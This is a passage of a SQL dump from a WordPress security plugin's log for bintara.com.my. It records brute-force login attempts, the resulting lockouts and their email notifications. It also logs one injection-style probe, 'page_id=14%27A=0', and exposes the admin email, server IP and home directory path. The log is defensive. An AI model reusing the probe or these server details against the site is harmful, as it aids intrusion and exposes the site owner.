14:17:28',17855288,19341208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'51.77.193.28'),(26200,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:17:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:17:28\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:17:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:17:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:17:28','2019-09-21 14:17:28',17939616,19341208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'51.77.193.28'),(26201,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:17:28','2019-09-21 14:17:28',18146368,19341208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'51.77.193.28'),(26202,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:39:\"http://bintara.com.my/?page_id=14%27A=0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"ISO-8859-1,utf-8;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.net/?page_id=14\\\'A=0\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:16:\"page_id=14%27A=0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"41.218.197.176\";s:11:\"REMOTE_PORT\";s:5:\"40213\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:22:\"http://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxArfBTP0kPOVnb8jxcQAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075458.2487\";s:12:\"REQUEST_TIME\";s:10:\"1569075458\";}}','notice','2019-09-21 14:17:39','2019-09-21 14:17:38',18125608,19650256,'http://bintara.com.myhttp://bintara.com.my/?page_id=14%27A=0',1,0,'41.218.197.176'),(26203,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxBHkXpgmG5P@iB8k7mQAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"51.254.175.184\";s:11:\"REMOTE_PORT\";s:5:\"33402\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxBHkXpgmG5P@iB8k7mQAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075460.2267\";s:12:\"REQUEST_TIME\";s:10:\"1569075460\";}}','notice','2019-09-21 14:17:41','2019-09-21 14:17:40',17850312,19340712,'https://bintara.com.my/2019/wp-login.php',1,0,'51.254.175.184'),(26204,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:17:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:17:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:17:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:17:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:17:41','2019-09-21 14:17:40',17935296,19340712,'https://bintara.com.my/2019/wp-login.php',1,0,'51.254.175.184'),(26205,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:17:41','2019-09-21 14:17:40',18141736,19340712,'https://bintara.com.my/2019/wp-login.php',1,0,'51.254.175.184'),(26206,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxF7fBTP0kPOVnb8jxcgAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"69.0.149.222\";s:11:\"REMOTE_PORT\";s:5:\"33596\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxF7fBTP0kPOVnb8jxcgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075479.4459\";s:12:\"REQUEST_TIME\";s:10:\"1569075479\";}}','notice','2019-09-21 14:18:00','2019-09-21 14:17:59',17850288,19340616,'https://bintara.com.my/blog/wp-login.php',1,0,'69.0.149.222'),(26207,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:17:59\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:17:59\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:17:59\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:17:59\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:18:00','2019-09-21 14:17:59',17934872,19340616,'https://bintara.com.my/blog/wp-login.php',1,0,'69.0.149.222'),(26208,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:18:00','2019-09-21 14:17:59',18141192,19340616,'https://bintara.com.my/blog/wp-login.php',1,0,'69.0.149.222'),(26209,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxSjDrcQxTmGrCWuaUhgAAAcw\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.255.83.132\";s:11:\"REMOTE_PORT\";s:5:\"36141\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxSjDrcQxTmGrCWuaUhgAAAcw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075530.9196\";s:12:\"REQUEST_TIME\";s:10:\"1569075530\";}}','notice','2019-09-21 14:18:52','2019-09-21 14:18:51',17853472,19338856,'https://bintara.com.my/test/wp-login.php',1,0,'51.255.83.132'),(26210,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:18:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:18:51\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:18:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:18:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:18:52','2019-09-21 14:18:51',17937288,19338856,'https://bintara.com.my/test/wp-login.php',1,0,'51.255.83.132'),(26211,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:18:52','2019-09-21 14:18:51',18143640,19338856,'https://bintara.com.my/test/wp-login.php',1,0,'51.255.83.132'),(26212,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxTXkXpgmG5P@iB8k7wwAAAIc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"112.78.3.26\";s:11:\"REMOTE_PORT\";s:5:\"39682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxTXkXpgmG5P@iB8k7wwAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075533.1609\";s:12:\"REQUEST_TIME\";s:10:\"1569075533\";}}','notice','2019-09-21 14:18:54','2019-09-21 14:18:53',17851408,19340704,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.78.3.26'),(26213,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:18:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:18:53\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:18:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:18:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:18:54','2019-09-21 14:18:53',17936144,19340704,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.78.3.26'),(26214,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:18:54','2019-09-21 14:18:53',18142600,19340704,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.78.3.26'),(26215,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxTViJ7D9Gn7wDPh8lzAAAAMA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"51408\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxTViJ7D9Gn7wDPh8lzAAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075533.557\";s:12:\"REQUEST_TIME\";s:10:\"1569075533\";}}','notice','2019-09-21 14:18:54','2019-09-21 14:18:53',17845600,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'45.252.248.161'),(26216,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:18:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:18:53\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:18:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:18:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:18:54','2019-09-21 